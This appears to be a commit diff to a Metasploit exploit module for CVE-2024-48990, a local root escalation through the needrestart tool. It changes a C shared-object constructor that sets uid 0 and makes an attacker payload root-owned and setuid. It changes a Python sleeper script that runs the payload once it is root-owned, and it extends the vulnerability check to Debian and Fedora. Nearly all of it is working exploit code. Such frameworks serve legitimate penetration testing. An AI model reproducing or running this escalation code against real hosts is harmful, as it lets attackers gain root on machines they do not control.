needrestart improvements

Author: h00die

data/exploits/CVE-2024-48990/lib.metasm

@@ -23,5 +23,5 @@ void a(void) __attribute__((constructor));
 void __attribute__((constructor)) a() {
   setuid(0);
   setgid(0);
-  system("chown root:root 'PAYLOAD_PATH'; chmod a+x 'PAYLOAD_PATH'; chmod u+s 'PAYLOAD_PATH' &");
+  system("chown root:root 'PAYLOAD_PATH'; chmod a+x,u+s 'PAYLOAD_PATH'");
 }

data/exploits/CVE-2024-48990/sleeper.py

@@ -5,10 +5,13 @@
 print("#########################\n\nDont mind the error message above\n\nWaiting for needrestart to run...")
 
 while True:
-    file_stat = os.stat('PAYLOAD_PATH')
+    try:
+        file_stat = os.stat('PAYLOAD_PATH')
+    except FileNotFoundError:
+        break
     username = pwd.getpwuid(file_stat.st_uid).pw_name
     if (username == 'root'):
-        print("Payload owned by: " + username)
-        os.system('PAYLOAD_PATH &')
+        #print("Payload owned by: " + username)
+        os.system('PAYLOAD_PATH')
         break
     time.sleep(1)

documentation/modules/exploit/linux/local/ubuntu_needrestart_lpe.md

@@ -6,6 +6,12 @@ attacker-controlled PYTHONPATH environment variable.
 
 Verified against Ubuntu 22.04 with needrestart 3.5-5ubuntu2.1
 
+### Debian 
+
+Install: `apt-get install needrestart=3.6-4+deb12u1`
+
+Binary location: `/usr/sbin/needrestart`
+
 ## Verification Steps
 
 1. Install the application

modules/exploits/linux/local/ubuntu_needrestart_lpe.rb

@@ -71,24 +71,37 @@ def check
       '22.04' => Rex::Version.new('3.5-5ubuntu2.2'),
       '20.04' => Rex::Version.new('3.4-6ubuntu0.1.esm1'),
       '18.04' => Rex::Version.new('3.1-1ubuntu0.1.esm1'),
-      '16.04' => Rex::Version.new('2.6-1ubuntu0.1.esm1')
+      '16.04' => Rex::Version.new('2.6-1ubuntu0.1.esm1'),
+      '12' => Rex::Version.new('3.6-4.deb12u2'), # debian bookworm
+      '11' => Rex::Version.new('3.5-4.deb11u4'), # debian bullseye
+      '41' => Rex::Version.new('3.8-1.fc41') # fedora 41
     }
     info = get_sysinfo
-    return CheckCode::Safe('Only Ubuntu is exploitable') unless info[:distro] == 'ubuntu'
-
-    version = info[:version].split(' ')[1].slice(0, 5) # take off any extra version info
-    return CheckCode::Safe("Ubuntu version #{version} is not vulnerable") unless fixed_versions.key? version
+    return CheckCode::Safe('Only Ubuntu/Debian/Fedora have check functionality') unless ['debian', 'ubuntu', 'Fedora'].include? info[:distro]
+
+    if info[:distro] == 'ubuntu'
+      version = info[:version].split(' ')[1].slice(0, 5) # take off any extra version info
+      return CheckCode::Safe("Ubuntu version #{version} is not vulnerable or untested") unless fixed_versions.key? version
+    elsif info[:distro] == 'debian'
+      version = info[:version].split(' ')[2]
+      return CheckCode::Safe("Debian version #{version} is not vulnerable or untested") unless fixed_versions.key? version
+    elsif info[:distro] == 'Fedora' # untested XXX need to confirm
+      version = info[:version].split(' ')[1]
+      return CheckCode::Safe("Fedora version #{version} is not vulnerable or untested") unless fixed_versions.key? version
+    end
 
     return CheckCode::Safe('needrestart binary not found') unless command_exists?('needrestart')
 
     package = cmd_exec('dpkg -l needrestart | grep \'^ii\'')
     package = package.split(' ')[2]
     package = package.gsub('+', '.')
+    package = package.gsub('needrestart-', '') # fedora specific
     package = Rex::Version.new(package)
     return CheckCode::Safe('needrestart not install, or not detected.') if package.nil?
-    return CheckCode::Appears("Vulnerable needrestart version #{package} detected on Ubuntu #{version}") if package < fixed_versions[version]
 
-    CheckCode::Safe("needrestart is not vulnerable on Ubuntu #{version}")
+    return CheckCode::Appears("Vulnerable needrestart version #{package} detected on Ubuntu/Debian/Fedora #{version}") if package < fixed_versions[version]
+
+    CheckCode::Safe("needrestart is not vulnerable on Ubuntu/Debian/Fedora #{version}")
   end
 
   def exploit